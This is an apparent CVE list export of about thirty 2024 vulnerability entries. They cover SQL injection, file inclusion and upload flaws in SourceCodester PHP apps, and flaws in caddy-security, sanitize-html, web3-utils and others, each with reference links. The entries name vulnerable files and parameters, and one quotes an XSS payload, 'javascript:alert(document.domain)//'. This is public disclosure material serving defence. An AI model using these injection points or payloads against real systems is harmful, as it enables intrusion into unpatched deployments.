CVE    2024    2156    Candidate    A vulnerability was found in SourceCodester Best POS Management System 1.0. It has been classified as critical. Affected is an unknown function of the file admin_class.php. The manipulation of the argument img leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255588.    MISC:VDB-255588 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255588   |   MISC:VDB-255588 | SourceCodester Best POS Management System admin_class.php sql injection   |   URL:https://vuldb.com/?id.255588   |   MISC:https://github.com/wkeyi0x1/vul-report/blob/main/Best%20pos%20management%20system%20in%20php/Report-SQLI-1.md   |   URL:https://github.com/wkeyi0x1/vul-report/blob/main/Best%20pos%20management%20system%20in%20php/Report-SQLI-1.md    Assigned (20240303)
CVE    2024    2155    Candidate    A vulnerability was found in SourceCodester Best POS Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255587.    MISC:VDB-255587 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.255587   |   MISC:VDB-255587 | SourceCodester Best POS Management System index.php file inclusion   |   URL:https://vuldb.com/?id.255587   |   MISC:https://github.com/wkeyi0x1/vul-report/blob/main/Best%20pos%20management%20system%20in%20php/report.md   |   URL:https://github.com/wkeyi0x1/vul-report/blob/main/Best%20pos%20management%20system%20in%20php/report.md    Assigned (20240303)
CVE    2024    2154    Candidate    A vulnerability has been found in SourceCodester Online Mobile Management Store 1.0 and classified as critical. This vulnerability affects unknown code of the file view_product.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-255586 is the identifier assigned to this vulnerability.    MISC:VDB-255586 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255586   |   MISC:VDB-255586 | SourceCodester Online Mobile Management Store view_product.php sql injection   |   URL:https://vuldb.com/?id.255586   |   MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Unauthenticated%20SQL%20Injection%20-%20Mobile%20Management%20Store.md   |   URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Unauthenticated%20SQL%20Injection%20-%20Mobile%20Management%20Store.md    Assigned (20240303)
CVE    2024    2153    Candidate    A vulnerability, which was classified as critical, was found in SourceCodester Online Mobile Management Store 1.0. This affects an unknown part of the file /admin/orders/view_order.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255585 was assigned to this vulnerability.    MISC:VDB-255585 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255585   |   MISC:VDB-255585 | SourceCodester Online Mobile Management Store view_order.php sql injection   |   URL:https://vuldb.com/?id.255585   |   MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/SQL%20Injection%20in%20View%20Order%20-%20Mobile%20Management%20Store.md   |   URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/SQL%20Injection%20in%20View%20Order%20-%20Mobile%20Management%20Store.md    Assigned (20240303)
CVE    2024    2152    Candidate    A vulnerability, which was classified as critical, has been found in SourceCodester Online Mobile Management Store 1.0. Affected by this issue is some unknown functionality of the file /admin/product/manage_product.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255584.    MISC:VDB-255584 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255584   |   MISC:VDB-255584 | SourceCodester Online Mobile Management Store manage_product.php sql injection   |   URL:https://vuldb.com/?id.255584   |   MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/SQL%20Injection%20in%20Mobile%20Management%20Store.md   |   URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/SQL%20Injection%20in%20Mobile%20Management%20Store.md    Assigned (20240303)
CVE    2024    2151    Candidate    A vulnerability classified as problematic was found in SourceCodester Online Mobile Management Store 1.0. Affected by this vulnerability is an unknown functionality of the component Product Price Handler. The manipulation of the argument quantity with the input -1 leads to business logic errors. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255583.    MISC:VDB-255583 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.255583   |   MISC:VDB-255583 | SourceCodester Online Mobile Management Store Product Price logic error   |   URL:https://vuldb.com/?id.255583   |   MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Business%20Logic%20in%20Mobile%20Management%20Store.md   |   URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Business%20Logic%20in%20Mobile%20Management%20Store.md    Assigned (20240303)
CVE    2024    21505    Candidate    Versions of the package web3-utils before 4.2.1 are vulnerable to Prototype Pollution via the utility functions format and mergeDeep, due to insecure recursive merge. An attacker can manipulate an object's prototype, potentially leading to the alteration of the behavior of all objects inheriting from the affected prototype by passing specially crafted input to these functions.    MISC:https://github.com/web3/web3.js/commit/8ed041c6635d807b3da8960ad49e125e3d1b0e80   |   URL:https://github.com/web3/web3.js/commit/8ed041c6635d807b3da8960ad49e125e3d1b0e80   |   MISC:https://security.snyk.io/vuln/SNYK-JS-WEB3UTILS-6229337   |   URL:https://security.snyk.io/vuln/SNYK-JS-WEB3UTILS-6229337    Assigned (20231222)
CVE    2024    21504    Candidate    Versions of the package livewire/livewire from 3.3.5 and before 3.4.9 are vulnerable to Cross-site Scripting (XSS) when a page uses [Url] for a property. An attacker can inject HTML code in the context of the user's browser session by crafting a malicious link and convincing the user to click on it.    MISC:https://github.com/livewire/livewire/commit/c65b3f0798ab2c9338213ede3588c3cdf4e6fcc0   |   URL:https://github.com/livewire/livewire/commit/c65b3f0798ab2c9338213ede3588c3cdf4e6fcc0   |   MISC:https://github.com/livewire/livewire/pull/8117   |   URL:https://github.com/livewire/livewire/pull/8117   |   MISC:https://github.com/livewire/livewire/releases/tag/v3.4.9   |   URL:https://github.com/livewire/livewire/releases/tag/v3.4.9   |   MISC:https://security.snyk.io/vuln/SNYK-PHP-LIVEWIRELIVEWIRE-6446222   |   URL:https://security.snyk.io/vuln/SNYK-PHP-LIVEWIRELIVEWIRE-6446222    Assigned (20231222)
CVE    2024    21503    Candidate    Versions of the package black before 24.3.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the lines_with_leading_tabs_expanded function in the strings.py file. An attacker could exploit this vulnerability by crafting a malicious input that causes a denial of service. Exploiting this vulnerability is possible when running Black on untrusted input, or if you habitually put thousands of leading tab characters in your docstrings.    MISC:https://github.com/psf/black/commit/f00093672628d212b8965a8993cee8bedf5fe9b8   |   URL:https://github.com/psf/black/commit/f00093672628d212b8965a8993cee8bedf5fe9b8   |   MISC:https://github.com/psf/black/releases/tag/24.3.0   |   URL:https://github.com/psf/black/releases/tag/24.3.0   |   MISC:https://security.snyk.io/vuln/SNYK-PYTHON-BLACK-6256273   |   URL:https://security.snyk.io/vuln/SNYK-PYTHON-BLACK-6256273    Assigned (20231222)
CVE    2024    21502    Candidate    Versions of the package fastecdsa before 2.3.2 are vulnerable to Use of Uninitialized Variable on the stack, via the curvemath_mul function in src/curveMath.c, due to being used and interpreted as user-defined type. Depending on the variable's actual value it could be arbitrary free(), arbitrary realloc(), null pointer dereference and other. Since the stack can be controlled by the attacker, the vulnerability could be used to corrupt allocator structure, leading to possible heap exploitation. The attacker could cause denial of service by exploiting this vulnerability.    MISC:https://gist.github.com/keltecc/49da037072276f21b005a8337c15db26   |   URL:https://gist.github.com/keltecc/49da037072276f21b005a8337c15db26   |   MISC:https://github.com/AntonKueltz/fastecdsa/blob/v2.3.1/src/curveMath.c%23L210   |   URL:https://github.com/AntonKueltz/fastecdsa/blob/v2.3.1/src/curveMath.c%23L210   |   MISC:https://github.com/AntonKueltz/fastecdsa/commit/57fc5689c95d649dab7ef60cc99ac64589f01e36   |   URL:https://github.com/AntonKueltz/fastecdsa/commit/57fc5689c95d649dab7ef60cc99ac64589f01e36   |   MISC:https://security.snyk.io/vuln/SNYK-PYTHON-FASTECDSA-6262045   |   URL:https://security.snyk.io/vuln/SNYK-PYTHON-FASTECDSA-6262045    Assigned (20231222)
CVE    2024    21501    Candidate    Versions of the package sanitize-html before 2.12.1 are vulnerable to Information Exposure when used on the backend and with the style attribute allowed, allowing enumeration of files in the system (including project dependencies). An attacker could exploit this vulnerability to gather details about the file system structure and dependencies of the targeted server.    MISC:https://gist.github.com/Slonser/8b4d061abe6ee1b2e10c7242987674cf   |   URL:https://gist.github.com/Slonser/8b4d061abe6ee1b2e10c7242987674cf   |   MISC:https://github.com/apostrophecms/apostrophe/discussions/4436   |   URL:https://github.com/apostrophecms/apostrophe/discussions/4436   |   MISC:https://github.com/apostrophecms/sanitize-html/commit/c5dbdf77fe8b836d3bf4554ea39edb45281ec0b4   |   URL:https://github.com/apostrophecms/sanitize-html/commit/c5dbdf77fe8b836d3bf4554ea39edb45281ec0b4   |   MISC:https://github.com/apostrophecms/sanitize-html/pull/650   |   URL:https://github.com/apostrophecms/sanitize-html/pull/650   |   MISC:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6276557   |   URL:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6276557   |   MISC:https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-6256334   |   URL:https://security.snyk.io/vuln/SNYK-JS-SANITIZEHTML-6256334    Assigned (20231222)
CVE    2024    21500    Candidate    All versions of the package github.com/greenpau/caddy-security are vulnerable to Improper Restriction of Excessive Authentication Attempts via the two-factor authentication (2FA). Although the application blocks the user after several failed attempts to provide 2FA codes, attackers can bypass this blocking mechanism by automating the application’s full multistep 2FA process.    MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   MISC:https://github.com/greenpau/caddy-security/issues/271   |   URL:https://github.com/greenpau/caddy-security/issues/271   |   MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249864   |   URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249864    Assigned (20231222)
CVE    2024    2150    Candidate    A vulnerability, which was classified as critical, has been found in SourceCodester Insurance Management System 1.0. This issue affects some unknown processing. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255503.    MISC:VDB-255503 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.255503   |   MISC:VDB-255503 | SourceCodester Insurance Management System file inclusion   |   URL:https://vuldb.com/?id.255503   |   MISC:https://github.com/wkeyi0x1/vul-report/blob/main/Insurance%20Management%20System%20PHP%20and%20MySQL/Insurance%20Management%20System%20PHP%20and%20MySQL%20v1.0%20-%20File%20Inclusion.md   |   URL:https://github.com/wkeyi0x1/vul-report/blob/main/Insurance%20Management%20System%20PHP%20and%20MySQL/Insurance%20Management%20System%20PHP%20and%20MySQL%20v1.0%20-%20File%20Inclusion.md    Assigned (20240302)
CVE    2024    21499    Candidate    All versions of the package github.com/greenpau/caddy-security are vulnerable to HTTP Header Injection via the X-Forwarded-Proto header due to redirecting to the injected protocol. Exploiting this vulnerability could lead to bypass of security mechanisms or confusion in handling TLS.    MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   MISC:https://github.com/greenpau/caddy-security/issues/270   |   URL:https://github.com/greenpau/caddy-security/issues/270   |   MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249863   |   URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249863    Assigned (20231222)
CVE    2024    21498    Candidate    All versions of the package github.com/greenpau/caddy-security are vulnerable to Server-side Request Forgery (SSRF) via X-Forwarded-Host header manipulation. An attacker can expose sensitive information, interact with internal services, or exploit other vulnerabilities within the network by exploiting this vulnerability.    MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   MISC:https://github.com/greenpau/caddy-security/issues/269   |   URL:https://github.com/greenpau/caddy-security/issues/269   |   MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249862   |   URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249862    Assigned (20231222)
CVE    2024    21497    Candidate    All versions of the package github.com/greenpau/caddy-security are vulnerable to Open Redirect via the redirect_url parameter. An attacker could perform a phishing attack and trick users into visiting a malicious website by crafting a convincing URL with this parameter. To exploit this vulnerability, the user must take an action, such as clicking on a portal button or using the browser’s back button, to trigger the redirection.    MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   MISC:https://github.com/greenpau/caddy-security/issues/268   |   URL:https://github.com/greenpau/caddy-security/issues/268   |   MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249861   |   URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249861    Assigned (20231222)
CVE    2024    21496    Candidate    All versions of the package github.com/greenpau/caddy-security are vulnerable to Cross-site Scripting (XSS) via the Referer header, due to improper input sanitization. Although the Referer header is sanitized by escaping some characters that can allow XSS (e.g., [&], [<], [>], ["], [']), it does not account for the attack based on the JavaScript URL scheme (e.g., javascript:alert(document.domain)// payload). Exploiting this vulnerability may not be trivial, but it could lead to the execution of malicious scripts in the context of the target user’s browser, compromising user sessions.    MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   MISC:https://github.com/greenpau/caddy-security/issues/267   |   URL:https://github.com/greenpau/caddy-security/issues/267   |   MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249860   |   URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249860    Assigned (20231222)
CVE    2024    21495    Candidate    Versions of the package github.com/greenpau/caddy-security before 1.0.42 are vulnerable to Insecure Randomness due to using an insecure random number generation library which could possibly be predicted via a brute-force search. Attackers could use the potentially predictable nonce value used for authentication purposes in the OAuth flow to conduct OAuth replay attacks. In addition, insecure randomness is used while generating multifactor authentication (MFA) secrets and creating API keys in the database package.    MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   MISC:https://github.com/greenpau/caddy-security/issues/265   |   URL:https://github.com/greenpau/caddy-security/issues/265   |   MISC:https://github.com/greenpau/go-authcrunch/commit/ecd3725baf2683eb1519bb3c81ae41085fbf7dc2   |   URL:https://github.com/greenpau/go-authcrunch/commit/ecd3725baf2683eb1519bb3c81ae41085fbf7dc2   |   MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6248275   |   URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6248275    Assigned (20231222)
CVE    2024    21494    Candidate    All versions of the package github.com/greenpau/caddy-security are vulnerable to Authentication Bypass by Spoofing via the X-Forwarded-For header due to improper input sanitization. An attacker can spoof an IP address used in the user identity module (/whoami API endpoint). This could lead to unauthorized access if the system trusts this spoofed IP address.    MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   MISC:https://github.com/greenpau/caddy-security/issues/266   |   URL:https://github.com/greenpau/caddy-security/issues/266   |   MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249859   |   URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-6249859    Assigned (20231222)
CVE    2024    21493    Candidate    All versions of the package github.com/greenpau/caddy-security are vulnerable to Improper Validation of Array Index when parsing a Caddyfile. Multiple parsing functions in the affected library do not validate whether their input values are nil before attempting to access elements, which can lead to a panic (index out of range). Panics during the parsing of a configuration file may introduce ambiguity and vulnerabilities, hindering the correct interpretation and configuration of the web server.    MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   MISC:https://github.com/greenpau/caddy-security/issues/263   |   URL:https://github.com/greenpau/caddy-security/issues/263   |   MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-5961078   |   URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-5961078    Assigned (20231222)
CVE    2024    21492    Candidate    All versions of the package github.com/greenpau/caddy-security are vulnerable to Insufficient Session Expiration due to improper user session invalidation upon clicking the "Sign Out" button. User sessions remain valid even after requests are sent to /logout and /oauth2/google/logout. Attackers who gain access to an active but supposedly logged-out session can perform unauthorized actions on behalf of the user.    MISC:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   URL:https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/   |   MISC:https://github.com/greenpau/caddy-security/issues/272   |   URL:https://github.com/greenpau/caddy-security/issues/272   |   MISC:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-5920787   |   URL:https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGREENPAUCADDYSECURITY-5920787    Assigned (20231222)
CVE    2024    21491    Candidate    Versions of the package svix before 1.17.0 are vulnerable to Authentication Bypass due to an issue in the verify function where signatures of different lengths are incorrectly compared. An attacker can bypass signature verification by providing a shorter signature that matches the beginning of the actual signature. **Note:** The attacker would need to know a victim uses the Rust library for verification, no easy way to automatically check that; and uses webhooks by a service that uses Svix, and then figure out a way to craft a malicious payload that will actually include all of the correct identifiers needed to trick the receivers to cause actual issues.    MISC:https://github.com/svix/svix-webhooks/commit/958821bd3b956d1436af65f70a0964d4ffb7daf6   |   URL:https://github.com/svix/svix-webhooks/commit/958821bd3b956d1436af65f70a0964d4ffb7daf6   |   MISC:https://github.com/svix/svix-webhooks/pull/1190   |   URL:https://github.com/svix/svix-webhooks/pull/1190   |   MISC:https://rustsec.org/advisories/RUSTSEC-2024-0010.html   |   URL:https://rustsec.org/advisories/RUSTSEC-2024-0010.html   |   MISC:https://security.snyk.io/vuln/SNYK-RUST-SVIX-6230729   |   URL:https://security.snyk.io/vuln/SNYK-RUST-SVIX-6230729    Assigned (20231222)
CVE    2024    21490    Candidate    This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the ng-srcset directive is vulnerable to super-linear runtime due to backtracking. With large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. **Note:** This package is EOL and will not receive any updates to address this issue. Users should migrate to [@angular/core](https://www.npmjs.com/package/@angular/core).    MISC:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6241746   |   URL:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6241746   |   MISC:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6241747   |   URL:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6241747   |   MISC:https://security.snyk.io/vuln/SNYK-JS-ANGULAR-6091113   |   URL:https://security.snyk.io/vuln/SNYK-JS-ANGULAR-6091113   |   MISC:https://stackblitz.com/edit/angularjs-vulnerability-ng-srcset-redos   |   URL:https://stackblitz.com/edit/angularjs-vulnerability-ng-srcset-redos    Assigned (20231222)
CVE    2024    2149    Candidate    A vulnerability classified as critical was found in CodeAstro Membership Management System 1.0. This vulnerability affects unknown code of the file settings.php. The manipulation of the argument currency leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-255502 is the identifier assigned to this vulnerability.    MISC:VDB-255502 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255502   |   MISC:VDB-255502 | CodeAstro Membership Management System settings.php sql injection   |   URL:https://vuldb.com/?id.255502   |   MISC:https://github.com/JiaDongGao1/CVE_Hunter/blob/main/SQLi-2.md   |   URL:https://github.com/JiaDongGao1/CVE_Hunter/blob/main/SQLi-2.md    Assigned (20240302)
CVE    2024    21488    Candidate    Versions of the package network before 0.7.0 are vulnerable to Arbitrary Command Injection due to use of the child_process exec function without input sanitization. If (attacker-controlled) user input is given to the mac_address_for function of the package, it is possible for the attacker to execute arbitrary commands on the operating system that this package is being run on.    MISC:https://gist.github.com/icemonster/282ab98fb68fc22aac7c576538f6369c   |   URL:https://gist.github.com/icemonster/282ab98fb68fc22aac7c576538f6369c   |   MISC:https://github.com/tomas/network/commit/5599ed6d6ff1571a5ccadea775430c131f381de7   |   URL:https://github.com/tomas/network/commit/5599ed6d6ff1571a5ccadea775430c131f381de7   |   MISC:https://github.com/tomas/network/commit/6ec8713580938ab4666df2f2d0f3399891ed2ad7   |   URL:https://github.com/tomas/network/commit/6ec8713580938ab4666df2f2d0f3399891ed2ad7   |   MISC:https://github.com/tomas/network/commit/72c523265940fe279eb0050d441522628f8988e5   |   URL:https://github.com/tomas/network/commit/72c523265940fe279eb0050d441522628f8988e5   |   MISC:https://security.snyk.io/vuln/SNYK-JS-NETWORK-6184371   |   URL:https://security.snyk.io/vuln/SNYK-JS-NETWORK-6184371    Assigned (20231222)
CVE    2024    21485    Candidate    Versions of the package dash-core-components before 2.13.0; versions of the package dash-core-components before 2.0.0; versions of the package dash before 2.15.0; versions of the package dash-html-components before 2.0.0; versions of the package dash-html-components before 2.0.16 are vulnerable to Cross-site Scripting (XSS) when the href of the a tag is controlled by an adversary. An authenticated attacker who stores a view that exploits this vulnerability could steal the data that's visible to another user who opens that view - not just the data already included on the page, but they could also, in theory, make additional requests and access other data accessible to this user. In some cases, they could also steal the access tokens of that user, which would allow the attacker to act as that user, including viewing other apps and resources hosted on the same server. **Note:** This is only exploitable in Dash apps that include some mechanism to store user input to be reloaded by a different user.    MISC:https://github.com/plotly/dash/commit/9920073c9a8619ae8f90fcec1924f2f3a4332a8c   |   URL:https://github.com/plotly/dash/commit/9920073c9a8619ae8f90fcec1924f2f3a4332a8c   |   MISC:https://github.com/plotly/dash/issues/2729   |   URL:https://github.com/plotly/dash/issues/2729   |   MISC:https://github.com/plotly/dash/pull/2732   |   URL:https://github.com/plotly/dash/pull/2732   |   MISC:https://github.com/plotly/dash/releases/tag/v2.15.0   |   URL:https://github.com/plotly/dash/releases/tag/v2.15.0   |   MISC:https://security.snyk.io/vuln/SNYK-JS-DASHCORECOMPONENTS-6183084   |   URL:https://security.snyk.io/vuln/SNYK-JS-DASHCORECOMPONENTS-6183084   |   MISC:https://security.snyk.io/vuln/SNYK-JS-DASHHTMLCOMPONENTS-6226337   |   URL:https://security.snyk.io/vuln/SNYK-JS-DASHHTMLCOMPONENTS-6226337   |   MISC:https://security.snyk.io/vuln/SNYK-PYTHON-DASH-6226335   |   URL:https://security.snyk.io/vuln/SNYK-PYTHON-DASH-6226335   |   MISC:https://security.snyk.io/vuln/SNYK-PYTHON-DASHCORECOMPONENTS-6226334   |   URL:https://security.snyk.io/vuln/SNYK-PYTHON-DASHCORECOMPONENTS-6226334   |   MISC:https://security.snyk.io/vuln/SNYK-PYTHON-DASHHTMLCOMPONENTS-6226336   |   URL:https://security.snyk.io/vuln/SNYK-PYTHON-DASHHTMLCOMPONENTS-6226336    Assigned (20231222)
CVE    2024    21484    Candidate    Versions of the package jsrsasign before 11.0.0 are vulnerable to Observable Discrepancy via the RSA PKCS1.5 or RSAOAEP decryption process. An attacker can decrypt ciphertexts by exploiting the Marvin security flaw. Exploiting this vulnerability requires the attacker to have access to a large number of ciphertexts encrypted with the same key. Workaround: The vulnerability can be mitigated by finding and replacing RSA and RSAOAEP decryption with another crypto library.    MISC:https://github.com/kjur/jsrsasign/issues/598   |   URL:https://github.com/kjur/jsrsasign/issues/598   |   MISC:https://github.com/kjur/jsrsasign/releases/tag/11.0.0   |   URL:https://github.com/kjur/jsrsasign/releases/tag/11.0.0   |   MISC:https://people.redhat.com/~hkario/marvin/   |   URL:https://people.redhat.com/~hkario/marvin/   |   MISC:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6070734   |   URL:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6070734   |   MISC:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBKJUR-6070733   |   URL:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBKJUR-6070733   |   MISC:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6070732   |   URL:https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6070732   |   MISC:https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-6070731   |   URL:https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-6070731    Assigned (20231222)
CVE    2024    21483    Candidate    A vulnerability has been identified in SENTRON 7KM PAC3120 AC/DC (7KM3120-0BA01-1DA0) (All versions >= V3.2.3 < V3.3.0 only when manufactured between LQN231003... and LQN231215... ( with LQNYYMMDD...)), SENTRON 7KM PAC3120 DC (7KM3120-1BA01-1EA0) (All versions >= V3.2.3 < V3.3.0 only when manufactured between LQN231003... and LQN231215... ( with LQNYYMMDD...)), SENTRON 7KM PAC3220 AC/DC (7KM3220-0BA01-1DA0) (All versions >= V3.2.3 < V3.3.0 only when manufactured between LQN231003... and LQN231215... ( with LQNYYMMDD...)), SENTRON 7KM PAC3220 DC (7KM3220-1BA01-1EA0) (All versions >= V3.2.3 < V3.3.0 only when manufactured between LQN231003... and LQN231215... ( with LQNYYMMDD...)). The read out protection of the internal flash of affected devices was not properly set at the end of the manufacturing process. An attacker with physical access to the device could read out the data.    MISC:https://cert-portal.siemens.com/productcert/html/ssa-792319.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-792319.html    Assigned (20231220)
CVE    2024    2148    Candidate    A vulnerability classified as critical has been found in SourceCodester Online Mobile Management Store 1.0. This affects an unknown part of the file /classes/Users.php. The manipulation of the argument img leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255501 was assigned to this vulnerability.    MISC:VDB-255501 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255501   |   MISC:VDB-255501 | SourceCodester Online Mobile Management Store Users.php unrestricted upload   |   URL:https://vuldb.com/?id.255501   |   MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/RCE%20via%20Arbitrary%20File%20Upload%20in%20Mobile%20Management%20Store.md   |   URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/RCE%20via%20Arbitrary%20File%20Upload%20in%20Mobile%20Management%20Store.md    Assigned (20240302)
CVE    2024    2147    Candidate    A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/login.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255500.    MISC:VDB-255500 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255500   |   MISC:VDB-255500 | SourceCodester Online Mobile Management Store login.php sql injection   |   URL:https://vuldb.com/?id.255500   |   MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Sql%20Injection%20Authentication%20Bypass%20in%20Mobile%20Management%20Store.md   |   URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Sql%20Injection%20Authentication%20Bypass%20in%20Mobile%20Management%20Store.md    Assigned (20240302)
CVE    2024    2146    Candidate    A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /?p=products. The manipulation of the argument search leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255499.    MISC:VDB-255499 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.255499   |   MISC:VDB-255499 | SourceCodester Online Mobile Management Store ?p=products cross site scripting   |   URL:https://vuldb.com/?id.255499   |   MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Reflected%20XSS%20in%20Mobile%20Management%20Store.md   |   URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Reflected%20XSS%20in%20Mobile%20Management%20Store.md    Assigned (20240302)
